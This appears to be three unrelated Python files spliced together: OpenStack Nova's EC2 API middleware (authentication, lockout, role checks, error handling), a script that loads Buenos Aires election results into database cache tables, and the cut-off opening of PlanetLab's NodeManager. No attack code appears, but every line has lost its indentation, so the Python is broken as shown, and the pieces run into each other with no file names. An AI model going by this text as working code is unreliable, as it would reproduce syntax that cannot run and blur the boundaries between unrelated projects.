# License for the specific language governing permissions and limitations
# under the License.
"""
Starting point for routing EC2 requests.
"""
import urlparse
from eventlet.green import httplib
from oslo.config import cfg
import webob
import webob.dec
import webob.exc
from nova.api.ec2 import apirequest
from nova.api.ec2 import ec2utils
from nova.api.ec2 import faults
from nova.api import validator
from nova import context
from nova import exception
from nova.openstack.common.gettextutils import _
from nova.openstack.common import importutils
from nova.openstack.common import jsonutils
from nova.openstack.common import log as logging
from nova.openstack.common import memorycache
from nova.openstack.common import timeutils
from nova import utils
from nova import wsgi
LOG = logging.getLogger(__name__)
ec2_opts = [
cfg.IntOpt('lockout_attempts',
default=5,
help='Number of failed auths before lockout.'),
cfg.IntOpt('lockout_minutes',
default=15,
help='Number of minutes to lockout if triggered.'),
cfg.IntOpt('lockout_window',
default=15,
help='Number of minutes for lockout window.'),
cfg.StrOpt('keystone_ec2_url',
default='http://localhost:5000/v2.0/ec2tokens',
help='URL to get token from ec2 request.'),
cfg.BoolOpt('ec2_private_dns_show_ip',
default=False,
help='Return the IP address as private dns hostname in '
'describe instances'),
cfg.BoolOpt('ec2_strict_validation',
default=True,
help='Validate security group names'
' according to EC2 specification'),
cfg.IntOpt('ec2_timestamp_expiry',
default=300,
help='Time in seconds before ec2 timestamp expires'),
]
CONF = cfg.CONF
CONF.register_opts(ec2_opts)
CONF.import_opt('use_forwarded_for', 'nova.api.auth')
## Fault Wrapper around all EC2 requests ##
class FaultWrapper(wsgi.Middleware):
"""Calls the middleware stack, captures any exceptions into faults."""
@webob.dec.wsgify(RequestClass=wsgi.Request)
def __call__(self, req):
try:
return req.get_response(self.application)
except Exception as ex:
LOG.exception(_("FaultWrapper: %s"), unicode(ex))
return faults.Fault(webob.exc.HTTPInternalServerError())
class RequestLogging(wsgi.Middleware):
"""Access-Log akin logging for all EC2 API requests."""
@webob.dec.wsgify(RequestClass=wsgi.Request)
def __call__(self, req):
start = timeutils.utcnow()
rv = req.get_response(self.application)
self.log_request_completion(rv, req, start)
return rv
def log_request_completion(self, response, request, start):
apireq = request.environ.get('ec2.request', None)
if apireq:
controller = apireq.controller
action = apireq.action
else:
controller = None
action = None
ctxt = request.environ.get('nova.context', None)
delta = timeutils.utcnow() - start
seconds = delta.seconds
microseconds = delta.microseconds
LOG.info(
"%s.%ss %s %s %s %s:%s %s [%s] %s %s",
seconds,
microseconds,
request.remote_addr,
request.method,
"%s%s" % (request.script_name, request.path_info),
controller,
action,
response.status_int,
request.user_agent,
request.content_type,
response.content_type,
context=ctxt)
class Lockout(wsgi.Middleware):
"""Lockout for x minutes on y failed auths in a z minute period.
x = lockout_timeout flag
y = lockout_window flag
z = lockout_attempts flag
Uses memcached if lockout_memcached_servers flag is set, otherwise it
uses a very simple in-process cache. Due to the simplicity of
the implementation, the timeout window is started with the first
failed request, so it will block if there are x failed logins within
that period.
There is a possible race condition where simultaneous requests could
sneak in before the lockout hits, but this is extremely rare and would
only result in a couple of extra failed attempts.
"""
def __init__(self, application):
"""middleware can use fake for testing."""
self.mc = memorycache.get_client()
super(Lockout, self).__init__(application)
@webob.dec.wsgify(RequestClass=wsgi.Request)
def __call__(self, req):
access_key = str(req.params['AWSAccessKeyId'])
failures_key = "authfailures-%s" % access_key
failures = int(self.mc.get(failures_key) or 0)
if failures >= CONF.lockout_attempts:
detail = _("Too many failed authentications.")
raise webob.exc.HTTPForbidden(detail=detail)
res = req.get_response(self.application)
if res.status_int == 403:
failures = self.mc.incr(failures_key)
if failures is None:
# NOTE(vish): To use incr, failures has to be a string.
self.mc.set(failures_key, '1', time=CONF.lockout_window * 60)
elif failures >= CONF.lockout_attempts:
LOG.warn(_('Access key %(access_key)s has had %(failures)d '
'failed authentications and will be locked out '
'for %(lock_mins)d minutes.'),
{'access_key': access_key,
'failures': failures,
'lock_mins': CONF.lockout_minutes})
self.mc.set(failures_key, str(failures),
time=CONF.lockout_minutes * 60)
return res
class EC2KeystoneAuth(wsgi.Middleware):
"""Authenticate an EC2 request with keystone and convert to context."""
@webob.dec.wsgify(RequestClass=wsgi.Request)
def __call__(self, req):
request_id = context.generate_request_id()
signature = req.params.get('Signature')
if not signature:
msg = _("Signature not provided")
return faults.ec2_error_response(request_id, "Unauthorized", msg,
status=400)
access = req.params.get('AWSAccessKeyId')
if not access:
msg = _("Access key not provided")
return faults.ec2_error_response(request_id, "Unauthorized", msg,
status=400)
# Make a copy of args for authentication and signature verification.
auth_params = dict(req.params)
# Not part of authentication args
auth_params.pop('Signature')
cred_dict = {
'access': access,
'signature': signature,
'host': req.host,
'verb': req.method,
'path': req.path,
'params': auth_params,
}
if "ec2" in CONF.keystone_ec2_url:
creds = {'ec2Credentials': cred_dict}
else:
creds = {'auth': {'OS-KSEC2:ec2Credentials': cred_dict}}
creds_json = jsonutils.dumps(creds)
headers = {'Content-Type': 'application/json'}
o = urlparse.urlparse(CONF.keystone_ec2_url)
if o.scheme == "http":
conn = httplib.HTTPConnection(o.netloc)
else:
conn = httplib.HTTPSConnection(o.netloc)
conn.request('POST', o.path, body=creds_json, headers=headers)
response = conn.getresponse()
data = response.read()
if response.status != 200:
if response.status == 401:
msg = response.reason
else:
msg = _("Failure communicating with keystone")
return faults.ec2_error_response(request_id, "Unauthorized", msg,
status=400)
result = jsonutils.loads(data)
conn.close()
try:
token_id = result['access']['token']['id']
user_id = result['access']['user']['id']
project_id = result['access']['token']['tenant']['id']
user_name = result['access']['user'].get('name')
project_name = result['access']['token']['tenant'].get('name')
roles = [role['name'] for role
in result['access']['user']['roles']]
except (AttributeError, KeyError) as e:
LOG.exception(_("Keystone failure: %s") % e)
msg = _("Failure communicating with keystone")
return faults.ec2_error_response(request_id, "Unauthorized", msg,
status=400)
remote_address = req.remote_addr
if CONF.use_forwarded_for:
remote_address = req.headers.get('X-Forwarded-For',
remote_address)
catalog = result['access']['serviceCatalog']
ctxt = context.RequestContext(user_id,
project_id,
user_name=user_name,
project_name=project_name,
roles=roles,
auth_token=token_id,
remote_address=remote_address,
service_catalog=catalog)
req.environ['nova.context'] = ctxt
return self.application
class NoAuth(wsgi.Middleware):
"""Add user:project as 'nova.context' to WSGI environ."""
@webob.dec.wsgify(RequestClass=wsgi.Request)
def __call__(self, req):
if 'AWSAccessKeyId' not in req.params:
raise webob.exc.HTTPBadRequest()
user_id, _sep, project_id = req.params['AWSAccessKeyId'].partition(':')
project_id = project_id or user_id
remote_address = req.remote_addr
if CONF.use_forwarded_for:
remote_address = req.headers.get('X-Forwarded-For', remote_address)
ctx = context.RequestContext(user_id,
project_id,
is_admin=True,
remote_address=remote_address)
req.environ['nova.context'] = ctx
return self.application
class Requestify(wsgi.Middleware):
def __init__(self, app, controller):
super(Requestify, self).__init__(app)
self.controller = importutils.import_object(controller)
@webob.dec.wsgify(RequestClass=wsgi.Request)
def __call__(self, req):
non_args = ['Action', 'Signature', 'AWSAccessKeyId', 'SignatureMethod',
'SignatureVersion', 'Version', 'Timestamp']
args = dict(req.params)
try:
expired = ec2utils.is_ec2_timestamp_expired(req.params,
expires=CONF.ec2_timestamp_expiry)
if expired:
msg = _("Timestamp failed validation.")
LOG.exception(msg)
raise webob.exc.HTTPForbidden(detail=msg)
# Raise KeyError if omitted
action = req.params['Action']
# Fix bug lp:720157 for older (version 1) clients
version = req.params['SignatureVersion']
if int(version) == 1:
non_args.remove('SignatureMethod')
if 'SignatureMethod' in args:
args.pop('SignatureMethod')
for non_arg in non_args:
# Remove, but raise KeyError if omitted
args.pop(non_arg)
except KeyError:
raise webob.exc.HTTPBadRequest()
except exception.InvalidRequest as err:
raise webob.exc.HTTPBadRequest(explanation=unicode(err))
LOG.debug(_('action: %s'), action)
for key, value in args.items():
LOG.debug(_('arg: %(key)s\t\tval: %(value)s'),
{'key': key, 'value': value})
# Success!
api_request = apirequest.APIRequest(self.controller, action,
req.params['Version'], args)
req.environ['ec2.request'] = api_request
return self.application
class Authorizer(wsgi.Middleware):
"""Authorize an EC2 API request.
Return a 401 if ec2.controller and ec2.action in WSGI environ may not be
executed in nova.context.
"""
def __init__(self, application):
super(Authorizer, self).__init__(application)
self.action_roles = {
'CloudController': {
'DescribeAvailabilityZones': ['all'],
'DescribeRegions': ['all'],
'DescribeSnapshots': ['all'],
'DescribeKeyPairs': ['all'],
'CreateKeyPair': ['all'],
'DeleteKeyPair': ['all'],
'DescribeSecurityGroups': ['all'],
'ImportKeyPair': ['all'],
'AuthorizeSecurityGroupIngress': ['netadmin'],
'RevokeSecurityGroupIngress': ['netadmin'],
'CreateSecurityGroup': ['netadmin'],
'DeleteSecurityGroup': ['netadmin'],
'GetConsoleOutput': ['projectmanager', 'sysadmin'],
'DescribeVolumes': ['projectmanager', 'sysadmin'],
'CreateVolume': ['projectmanager', 'sysadmin'],
'AttachVolume': ['projectmanager', 'sysadmin'],
'DetachVolume': ['projectmanager', 'sysadmin'],
'DescribeInstances': ['all'],
'DescribeAddresses': ['all'],
'AllocateAddress': ['netadmin'],
'ReleaseAddress': ['netadmin'],
'AssociateAddress': ['netadmin'],
'DisassociateAddress': ['netadmin'],
'RunInstances': ['projectmanager', 'sysadmin'],
'TerminateInstances': ['projectmanager', 'sysadmin'],
'RebootInstances': ['projectmanager', 'sysadmin'],
'UpdateInstance': ['projectmanager', 'sysadmin'],
'StartInstances': ['projectmanager', 'sysadmin'],
'StopInstances': ['projectmanager', 'sysadmin'],
'DeleteVolume': ['projectmanager', 'sysadmin'],
'DescribeImages': ['all'],
'DeregisterImage': ['projectmanager', 'sysadmin'],
'RegisterImage': ['projectmanager', 'sysadmin'],
'DescribeImageAttribute': ['all'],
'ModifyImageAttribute': ['projectmanager', 'sysadmin'],
'UpdateImage': ['projectmanager', 'sysadmin'],
'CreateImage': ['projectmanager', 'sysadmin'],
},
'AdminController': {
# All actions have the same permission: ['none'] (the default)
# superusers will be allowed to run them
# all others will get HTTPUnauthorized.
},
}
@webob.dec.wsgify(RequestClass=wsgi.Request)
def __call__(self, req):
context = req.environ['nova.context']
controller = req.environ['ec2.request'].controller.__class__.__name__
action = req.environ['ec2.request'].action
allowed_roles = self.action_roles[controller].get(action, ['none'])
if self._matches_any_role(context, allowed_roles):
return self.application
else:
LOG.audit(_('Unauthorized request for controller=%(controller)s '
'and action=%(action)s'),
{'controller': controller, 'action': action},
context=context)
raise webob.exc.HTTPUnauthorized()
def _matches_any_role(self, context, roles):
"""Return True if any role in roles is allowed in context."""
if context.is_admin:
return True
if 'all' in roles:
return True
if 'none' in roles:
return False
return any(role in context.roles for role in roles)
class Validator(wsgi.Middleware):
def validate_ec2_id(val):
if not validator.validate_str()(val):
return False
try:
ec2utils.ec2_id_to_id(val)
except exception.InvalidEc2Id:
return False
return True
validator.validate_ec2_id = validate_ec2_id
validator.DEFAULT_VALIDATOR = {
'instance_id': validator.validate_ec2_id,
'volume_id': validator.validate_ec2_id,
'image_id': validator.validate_ec2_id,
'attribute': validator.validate_str(),
'image_location': validator.validate_image_path,
'public_ip': utils.is_valid_ipv4,
'region_name': validator.validate_str(),
'group_name': validator.validate_str(max_length=255),
'group_description': validator.validate_str(max_length=255),
'size': validator.validate_int(),
'user_data': validator.validate_user_data
}
def __init__(self, application):
super(Validator, self).__init__(application)
@webob.dec.wsgify(RequestClass=wsgi.Request)
def __call__(self, req):
if validator.validate(req.environ['ec2.request'].args,
validator.DEFAULT_VALIDATOR):
return self.application
else:
raise webob.exc.HTTPBadRequest()
def exception_to_ec2code(ex):
"""Helper to extract EC2 error code from exception.
For other than EC2 exceptions (those without ec2_code attribute),
use exception name.
"""
if hasattr(ex, 'ec2_code'):
code = ex.ec2_code
else:
code = type(ex).__name__
return code
def ec2_error_ex(ex, req, code=None, message=None, unexpected=False):
"""
Return an EC2 error response based on passed exception and log
the exception on an appropriate log level:
* DEBUG: expected errors
* ERROR: unexpected client (4xx) errors
* CRITICAL: unexpected server (5xx) errors
Unexpected 5xx errors may contain sensitive information,
supress their messages for security.
"""
if not code:
code = exception_to_ec2code(ex)
status = getattr(ex, 'code', None)
if not status:
status = 500
if unexpected:
log_msg = _("Unexpected %(ex_name)s raised")
if status >= 500:
log_fun = LOG.critical
else:
log_fun = LOG.error
if ex.args:
log_msg = _("Unexpected %(ex_name)s raised: %(ex_str)s")
else:
log_fun = LOG.debug
if ex.args:
log_msg = _("%(ex_name)s raised: %(ex_str)s")
else:
log_msg = _("%(ex_name)s raised")
context = req.environ['nova.context']
request_id = context.request_id
log_msg_args = {
'ex_name': type(ex).__name__,
'ex_str': unicode(ex)
}
log_fun(log_msg % log_msg_args, context=context)
if ex.args and not message and (not unexpected or status < 500):
message = unicode(ex.args[0])
if unexpected:
# Log filtered environment for unexpected errors.
env = req.environ.copy()
for k in env.keys():
if not isinstance(env[k], basestring):
env.pop(k)
log_fun(_('Environment: %s') % jsonutils.dumps(env))
if not message:
message = _('Unknown error occured.')
# note(jruzicka): To preserve old behavior, all exceptions are returned
# with 400 status until EC2 errors are properly fixed.
return faults.ec2_error_response(request_id, code, message, status=400)
class Executor(wsgi.Application):
"""Execute an EC2 API request.
Executes 'ec2.action' upon 'ec2.controller', passing 'nova.context' and
'ec2.action_args' (all variables in WSGI environ.) Returns an XML
response, or a 400 upon failure.
"""
@webob.dec.wsgify(RequestClass=wsgi.Request)
def __call__(self, req):
context = req.environ['nova.context']
api_request = req.environ['ec2.request']
result = None
try:
result = api_request.invoke(context)
except exception.InstanceNotFound as ex:
ec2_id = ec2utils.id_to_ec2_inst_id(ex.kwargs['instance_id'])
message = ex.msg_fmt % {'instance_id': ec2_id}
return ec2_error_ex(ex, req, message=message)
except exception.VolumeNotFound as ex:
ec2_id = ec2utils.id_to_ec2_vol_id(ex.kwargs['volume_id'])
message = ex.msg_fmt % {'volume_id': ec2_id}
return ec2_error_ex(ex, req, message=message)
except exception.SnapshotNotFound as ex:
ec2_id = ec2utils.id_to_ec2_snap_id(ex.kwargs['snapshot_id'])
message = ex.msg_fmt % {'snapshot_id': ec2_id}
return ec2_error_ex(ex, req, message=message)
except exception.KeyPairExists as ex:
code = 'InvalidKeyPair.Duplicate'
return ec2_error_ex(ex, req, code=code)
except exception.InvalidKeypair as ex:
code = 'InvalidKeyPair.Format'
return ec2_error_ex(ex, req, code=code)
except (exception.EC2APIError,
exception.NotFound,
exception.InvalidParameterValue,
exception.InvalidPortRange,
exception.NotAuthorized,
exception.InvalidRequest,
exception.QuotaError,
exception.InvalidInstanceIDMalformed) as ex:
return ec2_error_ex(ex, req)
except Exception as ex:
return ec2_error_ex(ex, req, unexpected=True)
else:
resp = webob.Response()
resp.status = 200
resp.headers['Content-Type'] = 'text/xml'
resp.body = str(result)
return resp
| |
# coding: utf-8
import dataset
import csv
import os
# For simulation of results
import random
from default_settings import DB_RESULTS_URL
db = None
dir = os.path.dirname(__file__)
CABA_DATADICT_PATH = os.path.join(dir, '../data/caba/auxiliares')
CABA_RESULTS_PATH = os.path.join(dir, '../data/caba/resultados')
PASO_DATADICT_PATH = os.path.join(dir, '../data/paso/auxiliares')
PASO_RESULTS_PATH = os.path.join(dir, '../data/paso/resultados')
GEO_DATADICT_PATH = os.path.join(dir, '../data/geo')
POLLING_STATIONS_DATA_FILE = 'establecimientos_geo.csv'
POLLING_TABLES_DATA_FILE = 'mesas_final.csv'
CIRCUITS_DATA_FILE = 'circuitos.csv'
LISTS_DATA_FILE = 'listas_final.csv'
PARTIES_DATA_FILE = 'partidos_final.csv'
RESULTS_DATA_FILE = 'resultados_mesa.csv'
SCHEMA_POLLING_STATION_NUMERIC = {
"id_establecimiento": "id_establecimiento",
"id_comuna": "id_comuna",
"ciudadanos_habilitados": "electores"
}
SCHEMA_POLLING_TABLE_NUMERIC = {
"id_mesa": "id_mesa",
"id_establecimiento": "id_establecimiento",
"id_circuito": "id_circuito",
"ciudadanos_habilitados": "electores",
"id_barrio": "id_barrio",
"id_comuna": "id_comuna"
}
SCHEMA_PASO_LISTS_NUMERIC = {
"especial": "especial"
}
SCHEMA_PASO_PARTIES_NUMERIC = {
"especial": "especial"
}
SCHEMA_CABA_LISTS_NUMERIC = {
"especial": "especial"
}
SCHEMA_RESULTS_NUMERIC = {
"id_mesa": "id_mesa",
"cantidad_votantes": "electores",
"sobres_utilizados": "votantes",
"JEF": "votos",
"LEG": "votos_leg",
"COM": "votos_com"
}
SCHEMA_RESULTS_CABA_NUMERIC = {
"id_mesa": "id_mesa",
"ciudadanos_habilitados": "electores",
"id_establecimiento": "id_establecimiento",
"id_comuna": "id_comuna",
"VotosJef": "votos",
"VotosLeg": "votos_leg",
"VotosCom": "votos_com"
}
SPECIAL_PARTIES = {
"BLC": 0,
"NUL": 1,
"IMP": 1,
"REC": 1,
"TEC": 1
}
def randomized_int_by_perc(value=None, change=1):
'''randomized an integer by a percentage
if number is too low try absolute values
and return always positive result'''
perc = int(value/100)
if perc:
offset = random.randint(-(change * perc), change * perc)
else:
offset = random.randint(-5, 5)
result = 0 if (value + offset < 0) else value + offset
return result
def connect_dataset():
'''DB connection setup'''
return dataset.connect(DB_RESULTS_URL)
def recreateDB():
''' Clears the DB to make the script idempotent '''
for t in db.tables:
print t
db.get_table(t).drop()
def import_poll_stations(fname):
''' import geolocated polling stations'''
t = db.create_table('establecimientos',
primary_id='id_establecimiento',
primary_type='Integer')
f = open(fname, 'r')
fields = f.readline().replace("\"", "").strip().split(',')
c = csv.DictReader(f, fields)
results = []
for row in c:
t_results = {}
for k, v in row.iteritems():
if k in SCHEMA_POLLING_STATION_NUMERIC.keys():
kt = SCHEMA_POLLING_STATION_NUMERIC[k]
t_results[kt] = int(v) if v else None
if k not in SCHEMA_POLLING_STATION_NUMERIC.keys():
if k == "geom":
t_results[k] = v
else:
t_results[k] = v.decode('utf-8')
results.append(t_results)
t.insert_many(results)
def import_poll_tables(fname):
''' import polling tables CSV '''
t = db.create_table('mesas',
primary_id='id_mesa',
primary_type='Integer')
f = open(fname, 'r')
fields = f.readline().replace("\"", "").strip().split(',')
c = csv.DictReader(f, fields)
results = []
for row in c:
t_results = {}
for k, v in row.iteritems():
if k in SCHEMA_POLLING_TABLE_NUMERIC.keys():
kt = SCHEMA_POLLING_TABLE_NUMERIC[k]
t_results[kt] = int(v) if v else None
if k not in SCHEMA_POLLING_TABLE_NUMERIC.keys():
t_results[k] = v.decode('utf-8')
results.append(t_results)
t.insert_many(results, chunk_size=1000)
def paso_import_lists(fname):
''' import lists CSV '''
t = db.create_table('listas_paso',
primary_id='id_lista',
primary_type='String(3)')
f = open(fname, 'r')
fields = f.readline().replace("\"", "").strip().split(',')
c = csv.DictReader(f, fields)
results = []
for row in c:
t_results = {}
for k, v in row.iteritems():
if k in SCHEMA_PASO_LISTS_NUMERIC.keys():
kt = SCHEMA_PASO_LISTS_NUMERIC[k]
t_results[kt] = int(v) if v else None
if k not in SCHEMA_PASO_LISTS_NUMERIC.keys():
t_results[k] = v.decode('utf-8')
results.append(t_results)
t.insert_many(results)
def paso_import_parties(fname):
''' import political parties CSV '''
t = db.create_table('partidos_paso',
primary_id='id_partido',
primary_type='String(3)')
f = open(fname, 'r')
fields = f.readline().replace("\"", "").strip().split(',')
c = csv.DictReader(f, fields)
results = []
for row in c:
t_results = {}
for k, v in row.iteritems():
if k in SCHEMA_PASO_PARTIES_NUMERIC.keys():
kt = SCHEMA_PASO_PARTIES_NUMERIC[k]
t_results[kt] = int(v) if v else None
if k not in SCHEMA_PASO_PARTIES_NUMERIC.keys():
t_results[k] = v.decode('utf-8')
results.append(t_results)
t.insert_many(results)
def paso_import_results(fname):
''' import results by polling table CSV '''
t = db['resultados_paso']
f = open(fname, 'r')
fields = f.readline().replace("\"", "").strip().split(',')
c = csv.DictReader(f, fields)
results = []
for row in c:
t_results = {}
for k, v in row.iteritems():
if k in SCHEMA_RESULTS_NUMERIC.keys():
kt = SCHEMA_RESULTS_NUMERIC[k]
t_results[kt] = int(v) if v else None
if k not in SCHEMA_RESULTS_NUMERIC.keys():
t_results[k] = v.decode('utf-8')
results.append(t_results)
t.insert_many(results, chunk_size=50000)
def paso_results_by_poll_station_party():
''' aggregate results by polling station and
political party'''
tmp = []
q = '''
SELECT m.id_establecimiento, p.id_partido, SUM(r.votos) as votos
FROM resultados_paso r, listas_paso l, partidos_paso p, mesas m
WHERE r.nro_lista = l.nro_lista
AND l.id_partido = p.id_partido
AND m.id_mesa = r.id_mesa
GROUP BY m.id_establecimiento, p.id_partido;
'''
for p in db.query(q):
p['votos'] = int(p['votos'])
tmp.append(p)
cache_table = db['votos_establecimiento_paso']
cache_table.insert_many(tmp, chunk_size=1000)
def paso_classify_votes_by_poll_station():
''' classify votes by polling station '''
tmp = []
q = '''
SELECT id_establecimiento,
SUM(CASE WHEN id_partido = 'BLC'
THEN votos else 0 end) as blancos,
SUM(CASE WHEN id_partido not in ('NUL', 'REC', 'IMP')
THEN votos else 0 end) as validos,
SUM(CASE WHEN id_partido not in ('BLC', 'NUL', 'REC', 'IMP')
THEN votos else 0 end) as positivos,
SUM(CASE WHEN id_partido in ('NUL', 'REC', 'IMP')
THEN votos else 0 end) as invalidos
FROM votos_establecimiento_paso
GROUP BY id_establecimiento
'''
for p in db.query(q):
p['id_establecimiento'] = int(p['id_establecimiento'])
p['blancos'] = int(p['blancos'])
p['validos'] = int(p['validos'])
p['positivos'] = int(p['positivos'])
p['invalidos'] = int(p['invalidos'])
tmp.append(p)
votos_est = db['totales_establecimiento_paso']
votos_est.insert_many(tmp)
def paso_winner_cache_table():
q = '''
WITH %(winner)s AS (SELECT id_establecimiento, id_partido, votos,
row_number() over(partition by id_establecimiento
ORDER BY votos DESC) as rank,
(votos - lead(votos,1,0) over(partition by id_establecimiento
ORDER BY votos DESC)) as margin_victory
FROM %(table_votes)s
ORDER BY id_establecimiento, rank)
SELECT e.id_establecimiento as id_establecimiento,
e.id_comuna, e.geom,
e.domicilio, e.descripcion,
e.electores,
t.positivos, sqrt(t.positivos) as sqrt_positivos,
(t.validos + t.invalidos) as votantes,
w.id_partido, w.votos, w.margin_victory
FROM %(table_polling)s e, %(winner)s w, %(table_totals)s t
WHERE e.id_establecimiento = w.id_establecimiento
AND e.id_establecimiento = w.id_establecimiento
AND e.id_establecimiento = t.id_establecimiento
AND w.rank = 1;
''' % {'table_polling': 'establecimientos',
'table_votes': 'votos_establecimiento_paso',
'table_totals': 'totales_establecimiento_paso',
'winner': 'winner'}
results = db.query(q)
cache_table = db['cache_winner_paso']
cache_table.insert_many(results)
def caba_import_lists(fname):
''' import lists CSV '''
t = db.create_table('listas_caba',
primary_id='id_lista',
primary_type='String(3)')
f = open(fname, 'r')
fields = f.readline().replace("\"", "").strip().split(',')
c = csv.DictReader(f, fields)
results = []
for row in c:
t_results = {}
for k, v in row.iteritems():
if k in SCHEMA_CABA_LISTS_NUMERIC.keys():
kt = SCHEMA_CABA_LISTS_NUMERIC[k]
t_results[kt] = int(v) if v else None
if k not in SCHEMA_CABA_LISTS_NUMERIC.keys():
t_results[k] = v.decode('utf-8')
results.append(t_results)
t.insert_many(results)
def caba_import_results(fname):
''' import caba results by polling table CSV '''
t = db['resultados_caba']
f = open(fname, 'r')
fields = f.readline().replace("\"", "").strip().split(',')
c = csv.DictReader(f, fields)
results = []
for row in c:
t_results = {}
for k, v in row.iteritems():
if k in SCHEMA_RESULTS_CABA_NUMERIC.keys():
kt = SCHEMA_RESULTS_CABA_NUMERIC[k]
t_results[kt] = int(v) if v else None
if k not in SCHEMA_RESULTS_CABA_NUMERIC.keys():
t_results[k] = v.decode('utf-8')
# Randomize votes
#votos = t_results["votos"]
#t_results["votos"] = randomized_int_by_perc(votos, 10)
results.append(t_results)
t.insert_many(results, chunk_size=50000)
def caba_results_by_poll_station_party():
''' aggregate results by polling station and
political party'''
tmp = []
q = '''
SELECT m.id_establecimiento, l.id_partido, SUM(r.votos) as votos
FROM resultados_caba r, listas_caba l, mesas m
WHERE r.nro_lista = l.nro_lista
AND m.id_mesa = r.id_mesa
GROUP BY m.id_establecimiento, l.id_partido;
'''
for p in db.query(q):
p['votos'] = int(p['votos'])
tmp.append(p)
cache_table = db['votos_establecimiento_caba']
cache_table.insert_many(tmp, chunk_size=1000)
def caba_classify_votes_by_poll_station():
''' classify votes by polling station '''
tmp = []
q = '''
SELECT id_establecimiento,
SUM(CASE WHEN id_partido = 'BLC'
THEN votos else 0 end) as blancos,
SUM(CASE WHEN id_partido not in ('NUL', 'REC', 'IMP', 'TEC')
THEN votos else 0 end) as validos,
SUM(CASE WHEN id_partido not in ('BLC', 'NUL', 'REC', 'IMP', 'TEC')
THEN votos else 0 end) as positivos,
SUM(CASE WHEN id_partido in ('NUL', 'REC', 'IMP', 'TEC')
THEN votos else 0 end) as invalidos
FROM votos_establecimiento_caba
GROUP BY id_establecimiento
'''
for p in db.query(q):
p['id_establecimiento'] = int(p['id_establecimiento'])
p['blancos'] = int(p['blancos'])
p['validos'] = int(p['validos'])
p['positivos'] = int(p['positivos'])
p['invalidos'] = int(p['invalidos'])
tmp.append(p)
votos_est = db['totales_establecimiento_caba']
votos_est.insert_many(tmp)
def caba_winner_cache_table():
q = '''
WITH %(winner)s AS (SELECT id_establecimiento, id_partido, votos,
row_number() over(partition by id_establecimiento
ORDER BY votos DESC) as rank,
(votos - lead(votos,1,0) over(partition by id_establecimiento
ORDER BY votos DESC)) as margin_victory
FROM %(table_votes)s
ORDER BY id_establecimiento, rank)
SELECT e.id_establecimiento as id_establecimiento,
e.id_comuna, e.geom,
e.domicilio, e.descripcion,
e.electores,
t.positivos, sqrt(t.positivos) as sqrt_positivos,
(t.validos + t.invalidos) as votantes,
w.id_partido, w.votos, w.margin_victory
FROM %(table_polling)s e, %(winner)s w, %(table_totals)s t
WHERE e.id_establecimiento = w.id_establecimiento
AND e.id_establecimiento = w.id_establecimiento
AND e.id_establecimiento = t.id_establecimiento
AND w.rank = 1;
''' % {'table_polling': 'establecimientos',
'table_votes': 'votos_establecimiento_caba',
'table_totals': 'totales_establecimiento_caba',
'winner': 'winner'}
results = db.query(q)
cache_table = db['cache_winner_caba']
cache_table.insert_many(results)
def caba_diff_table():
'''get the difference for each polling station
and party between primary and final elections'''
q = '''
SELECT vc.id_establecimiento, vc.id_partido,
vc.votos, (vc.votos - vp.votos) as diferencia
FROM votos_establecimiento_caba vc,
votos_establecimiento_paso vp
WHERE vc.id_establecimiento = vp.id_establecimiento
and vc.id_partido = vp.id_partido
and vc.id_partido NOT IN ('BLC','IMP','REC','NUL','TEC')
'''
results = db.query(q)
cache_table = db['cache_diff_caba']
cache_table.insert_many(results)
def caba_polling_with_totals_table():
'''get the denormalized totals for each polling station'''
q = '''
SELECT e.*, tc.positivos, tc.validos, (tc.validos + tc.invalidos) as votantes
FROM establecimientos e,
totales_establecimiento_caba tc
WHERE e.id_establecimiento = tc.id_establecimiento
'''
results = db.query(q)
cache_table = db['establecimientos_totales_caba']
cache_table.insert_many(results)
def process_results():
print "clear DB"
#clearDB()
print "import common data"
import_common_data()
print "process PASO data"
process_PASO()
print "process CABA data"
process_CABA()
print "create cartodb cache tables"
process_cartodb()
def import_common_data():
print "import polling station data"
import_poll_stations('%s/%s'
% (GEO_DATADICT_PATH, POLLING_STATIONS_DATA_FILE))
print "import polling tables data"
import_poll_tables('%s/%s'
% (PASO_DATADICT_PATH, POLLING_TABLES_DATA_FILE))
def process_PASO():
print "import paso lists"
paso_import_lists('%s/%s'
% (PASO_DATADICT_PATH, LISTS_DATA_FILE))
print "import paso parties"
paso_import_parties('%s/%s'
% (PASO_DATADICT_PATH, PARTIES_DATA_FILE))
print "import paso results"
paso_import_results('%s/%s'
% (PASO_RESULTS_PATH, RESULTS_DATA_FILE))
print "aggregate paso results by polling station and party"
paso_results_by_poll_station_party()
print "classify paso votes by polling station"
paso_classify_votes_by_poll_station()
def process_CABA():
print "import caba lists"
caba_import_lists('%s/%s'
% (CABA_DATADICT_PATH, LISTS_DATA_FILE))
print "import caba results"
caba_import_results('%s/%s'
% (CABA_RESULTS_PATH, RESULTS_DATA_FILE))
print "aggregate results by polling station and party"
caba_results_by_poll_station_party()
print "classify votes by polling station"
caba_classify_votes_by_poll_station()
def process_cartodb():
print "create CABA winner unnormalized table for cartodb performance"
paso_winner_cache_table()
print "create PASO winner unnormalized table for cartodb performance"
caba_winner_cache_table()
print "create PASO diff unnormalized table for cartodb performance"
caba_diff_table()
print "create polling stations with totals"
caba_polling_with_totals_table()
if __name__ == "__main__":
db = connect_dataset()
process_results()
| |
#!/usr/bin/python
#
# Useful information can be found at https://svn.planet-lab.org/wiki/NodeManager
#
# Faiyaz Ahmed <faiyaza at cs dot princeton dot edu>
# Copyright (C) 2008 The Trustees of Princeton University
"""Node Manager"""
import optparse
import time
import xmlrpclib
import socket
import os
import sys
import resource
import glob
import pickle
import logger
import tools
from config import Config
from plcapi import PLCAPI
import random
class NodeManager:
PLUGIN_PATH = "/usr/share/NodeManager/plugins"
DB_FILE = "/var/lib/nodemanager/getslivers.pickle"
# the modules in this directory that need to be run
# NOTE: modules listed here will also be loaded in this order
# once loaded, they get re-ordered after their priority (lower comes first)
# for determining the runtime order
core_modules=['net', 'conf_files', 'slivermanager', 'bwmon']
default_period=600
default_random=301
default_priority=100
def __init__ (self):
parser = optparse.OptionParser()
parser.add_option('-d', '--daemon', action='store_true', dest='daemon', default=False,
help='run daemonized')
parser.add_option('-f', '--config', action='store', dest='config', default='/etc/planetlab/plc_config',
help='PLC configuration file')
parser.add_option('-k', '--session', action='store', dest='session', default='/etc/planetlab/session',
help='API session key (or file)')
parser.add_option('-p', '--period', action='store', dest='period', default=NodeManager.default_period,
help='Polling interval (sec) - default %d'%NodeManager.default_period)
parser.add_option('-r', '--random', action='store', dest='random', default=NodeManager.default_random,
help='Range for additional random polling interval (sec) -- default %d'%NodeManager.default_random)
